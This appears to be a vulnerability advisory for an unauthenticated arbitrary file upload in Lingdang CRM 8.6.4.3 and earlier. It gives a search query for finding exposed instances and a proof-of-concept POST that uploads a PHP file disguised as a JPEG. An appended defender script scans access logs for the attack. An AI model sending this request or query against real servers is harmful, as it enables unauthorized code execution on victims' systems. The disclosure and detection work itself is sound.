[Original] Shanghai Lingdang Information Technology Co., Ltd. Lingdang CRM <= 8.6.4.3 Arbitrary File Upload Vulnerability




Time Author Visibility Severity Rank
2024-11-04 10:56:04 Mstir Private High 3



Vulnerability Description

- Summary

Lingdang CRM is an intelligent customer relationship management tool designed for small and medium-sized enterprises, developed and operated by Shanghai Lingdang Information Technology Co., Ltd. It is widely used in industries including finance, education, healthcare, IT services, and real estate, helping businesses meet their personalized customer management needs and enhance their competitiveness. Whether for acquiring new customers, maintaining existing ones, or managing the sales process and service management, Lingdang CRM provides comprehensive and efficient solutions.

Lingdang CRM versions 8.6.4.3 and earlier are affected by an arbitrary file upload vulnerability in /crm/wechatSession/index.php. The vulnerability can be exploited without requiring any special permissions.

Asset Mapping

body="crmcommon/js/jquery/jquery-1.10.1.min.js" || (body="http://localhost:8088/crm/index.php" && body="ldcrm.base.js")

POC

POST /crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydi5972B29YvTnNyn
Cookie: PHPSESSID=sl03dj9rrc66erlu5c23jvng9n
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/crm/wechatSession/index.php?token=9b06a9617174f1085ddcfb4ccdb6837f&msgid=1&operation=upload
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
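
For defenders, an added example (not part of the original advisory) that scans web-server access logs for the request shape shown in the PoC above: a POST to /crm/wechatSession/index.php carrying operation=upload. It assumes Combined Log Format and case-insensitive path matching; the name upload_hits and the sample log lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Endpoint named in the advisory, lower-cased for case-insensitive matching
# (an assumption, in case the server's filesystem ignores case).
ENDPOINT = "/crm/wechatsession/index.php"


def upload_hits(lines):
    """Return one dict per POST to the endpoint carrying operation=upload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        raw_path, _, query = m["target"].partition("?")
        # Decode and normalise so //, /./ and %2E spellings of the path still match.
        path = posixpath.normpath("/" + unquote(raw_path).lstrip("/")).lower()
        ops = [v.lower() for v in parse_qs(query).get("operation", [])]
        if (path == ENDPOINT or path.startswith(ENDPOINT + "/")) and "upload" in ops:
            hits.append({"ip": m["ip"], "time": m["time"], "status": int(m["status"])})
    return hits


# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [04/Nov/2024:10:56:04 +0800] "POST /crm/wechatSession/index.php?token=T&msgid=1&operation=upload HTTP/1.1" 200 15 "-" "-"',
    '198.51.100.9 - - [04/Nov/2024:10:57:10 +0800] "POST /crm//wechatSession/./index.php?operation=Upload HTTP/1.1" 200 15 "-" "-"',
    '198.51.100.9 - - [04/Nov/2024:10:57:12 +0800] "POST /crm/wechatSession/index%2Ephp?msgid=1&operation=upload HTTP/1.1" 500 0 "-" "-"',
    '192.0.2.4 - - [04/Nov/2024:10:58:00 +0800] "GET /crm/wechatSession/index.php?operation=upload HTTP/1.1" 200 15 "-" "-"',
    '192.0.2.5 - - [04/Nov/2024:10:59:00 +0800] "POST /crm/index.php?operation=upload HTTP/1.1" 200 15 "-" "-"',
]

if __name__ == "__main__":
    for hit in upload_hits(SAMPLE):
        print(hit)
```

Access logs do not record the multipart body, so each hit is a lead to correlate with newly created files under the web root rather than proof that a file was written.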
